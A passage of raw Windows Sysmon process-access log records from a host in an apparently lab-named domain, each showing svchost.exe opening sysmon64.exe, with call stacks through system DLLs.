\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001584Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.144{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001583Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.144{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001582Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.144{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001581Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.144{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001580Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.144{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001579Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.144{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001578Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.144{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001577Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.144{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001576Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.144{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001575Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.144{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001574Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.144{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001573Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.144{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001572Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.144{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001571Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.144{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001570Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.144{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001569Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.144{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001568Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.144{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001567Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.144{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001566Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.144{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001565Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.144{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001564Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.144{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001563Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.144{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001562Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.144{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001561Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.144{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001560Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 